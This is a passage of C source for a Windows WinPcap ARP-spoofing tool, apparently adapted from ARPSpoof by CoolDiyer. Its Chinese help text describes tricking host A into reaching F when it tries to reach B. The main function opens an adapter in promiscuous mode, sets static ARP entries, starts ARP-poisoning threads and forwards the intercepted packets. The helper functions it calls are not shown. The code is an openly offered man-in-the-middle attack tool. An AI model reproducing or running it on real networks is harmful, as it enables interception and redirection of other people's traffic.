 * stored in sockaddr_in) as a dotted quad. The result lives in one of
 * IPTOSBUFFERS rotating static buffers, so up to IPTOSBUFFERS results may be
 * used at once (e.g. several in a single printf). Not thread-safe. */
#define IPTOSBUFFERS 12
char *iptos(u_long in)
{
 static char output[IPTOSBUFFERS][3*4+3+1];
 static short which;
 const unsigned char *octet = (const unsigned char *)&in;

 /* advance the ring index */
 which = (short)((which + 1) % IPTOSBUFFERS);
 /* longest result is "255.255.255.255" (15 chars), which fits the 16-byte slot */
 snprintf(output[which], sizeof output[which], "%u.%u.%u.%u",
   octet[0], octet[1], octet[2], octet[3]);
 return output[which];
}

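//
// Print one pcap interface (name, description, loopback flag and addresses)
// and, as a side effect, record the interface's IPv4 address in the global
// if_addr, which SetStatic uses as the interface argument of "arp -s". If the
// interface has several AF_INET addresses the last one printed wins, as before.
//
// d: interface entry from pcap_findalldevs; must not be NULL.
//
void ifprint(pcap_if_t *d)
{
  pcap_addr_t *a;

  /* Name */
  printf("%s\n",d->name);

  /* Description */
  if (d->description)
    printf("\tDescription: %s\n",d->description);

  /* Loopback Address*/
  printf("\tLoopback: %s\n",(d->flags & PCAP_IF_LOOPBACK)?"yes":"no");

  /* IP addresses */
  for(a=d->addresses;a;a=a->next) {
    // addr can be NULL for an entry; the original code dereferenced it for the
    // family print before its null check, so guard up front and skip instead.
    if (!a->addr)
      continue;

    printf("\tAddress Family: #%d\n",a->addr->sa_family);

    switch(a->addr->sa_family)
    {
      case AF_INET:
        printf("\tAddress Family Name: AF_INET\n");
        // interface IPv4 address, kept in the global for SetStatic
        if_addr =((struct sockaddr_in *)a->addr)->sin_addr.s_addr;
        printf("\tAddress: %s\n", iptos(if_addr));
        if (a->netmask)
          printf("\tNetmask: %s\n",iptos(((struct sockaddr_in *)a->netmask)->sin_addr.s_addr));
        if (a->broadaddr)
          printf("\tBroadcast Address: %s\n",iptos(((struct sockaddr_in *)a->broadaddr)->sin_addr.s_addr));
        if (a->dstaddr)
          printf("\tDestination Address: %s\n",iptos(((struct sockaddr_in *)a->dstaddr)->sin_addr.s_addr));
        break;

      case AF_INET6:
        printf("\tAddress Family Name: AF_INET6\n");
        break;

      default:
        printf("\tAddress Family Name: Unknown\n");
        break;
    }
  }
  printf("\n");
}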


//
// Entry point. Usage: <prog> A a B b F f H h (upper-case = IP, lower-case =
// MAC; see the help text). Lists the WinPcap adapters, opens the one chosen on
// stdin in promiscuous mode, installs the console handler that undoes the
// spoofing on Ctrl-C, fills the address table from argv, adds the static ARP
// entries, starts the poisoning threads and then runs pcap_loop until
// ResetSpoof calls pcap_breakloop.
//
// Notes: scanf's return value is not checked, so non-numeric input leaves
// inum uninitialised before the range check; the pcap_findalldevs failure
// path calls exit(1) directly.
//
int main(int argc, char *argv[])
{
 pcap_if_t *alldevs;
 pcap_if_t *d;
 int inum;
 int i=0;
 char errbuf[PCAP_ERRBUF_SIZE];

 printf("*** 双向假冒通信测试 V1.5 ***\n");
 printf("*** 按下CTRL+C中断假冒欺骗 ***\n");
 printf("*** hcper @ 2014.4.24修改 ***\n");
 printf("*** 参考:ARPSpoof Ver 3.1b by CoolDiyer ***\n\n");

 // exactly eight arguments: four IP/MAC pairs
 if (argc != 9)
 {
  printf("帮助: %s A a B b F f H h\n", argv[0]);
  printf("说明: 黑客H欺骗A使他访问B的时候实际上访问了F!\n");
  printf("大写字母表示IP,小写字母表示MAC\n\n");
  printf("例子: %s " \
    "192.168.10.1 11-11-11-11-11-11 " \
    "192.168.10.2 22-22-22-22-22-22 " \
    "192.168.10.3 33-33-33-33-33-33 " \
    "192.168.10.4 44-44-44-44-44-44\n", argv[0]);
  return 0;
 }
 
 /* Retrieve the device list */
 if(pcap_findalldevs(&alldevs, errbuf) == -1)
 {
  fprintf(stderr,"Error in pcap_findalldevs: %s\n", errbuf);
  exit(1);
 }
 
 /* Print the list */
 for(d=alldevs; d; d=d->next)
 {
  printf("%d. %s\n", ++i, d->name);
  if (d->description)
   printf("\t(%s)\n\n", d->description);
  else
   printf("\t(No description available)\n\n");
 }
 
 if(i==0)
 {
  printf("\nNo interfaces found! Make sure WinPcap is installed.\n");
  return -1;
 }
 
 printf("Enter the interface number (1-%d):",i);
 scanf("%d", &inum);
 
 if(inum < 1 || inum > i)
 {
  printf("\nInterface number out of range.\n");
  /* Free the device list */
  pcap_freealldevs(alldevs);
  return -1;
 }
 
 /* Jump to the selected adapter (empty-bodied loop: advance d inum-1 times) */
 for(d=alldevs, i=0; i< inum-1 ;d=d->next, i++);


 /* Open the device */
 /* Open the adapter */
 if ((adhandle= pcap_open_live(d->name, // name of the device
        65536,   // portion of the packet to capture.
           // 65536 grants that the whole packet will be captured on all the MACs.
        1,    // promiscuous mode (nonzero means promiscuous)
        1000,   // read timeout
        errbuf   // error buffer
        )) == NULL)
 {
  fprintf(stderr,"\nUnable to open the adapter. %s is not supported by WinPcap\n", d->name);
  /* Free the device list */
  pcap_freealldevs(alldevs);
  return -1;
 }

 printf("\n接口信息:\n");
 ifprint(d); // also records the interface IP in if_addr for SetStatic
 
 printf("\nlistening on %s...\n", d->description);

 // Ctrl-C / close / logoff / shutdown -> CtrlHandler -> ResetSpoof
 SetConsoleCtrlHandler((PHANDLER_ROUTINE) CtrlHandler, TRUE);

 GetAllIPMac(argv); // fill the IP/MAC table t from argv

 // last two octets of F's and B's IPs (little-endian host): the difference
 // drives ForwardPacket's incremental checksum fix-up
 ff = htonl(t.F) & 0xffff; // F
 bb = htonl(t.B) & 0xffff; // B

 SetStatic(argv); // static ARP entries on this host

 CheatArpCache(); // start the ARP-poisoning threads
/*
 printf("t:\n");
 dumpbin((unsigned char *)&t, sizeof(t) ); // debug

 printf("tA:\n");
 dumpbin((unsigned char *)&tA, sizeof(tA) ); // debug

 printf("tB:\n");
 dumpbin((unsigned char *)&tB, sizeof(tB) ); // debug

 printf("tF:\n");
 dumpbin((unsigned char *)&tF, sizeof(tF) ); // debug

 Sleep(2000);
*/
 /* At this point, we don't need any more the device list. Free it */
 pcap_freealldevs(alldevs);

 /* start the capture; returns after ResetSpoof's pcap_breakloop */
 pcap_loop(adhandle, 0, packet_handler, NULL);
 
 pcap_close(adhandle);

 return 0;
}
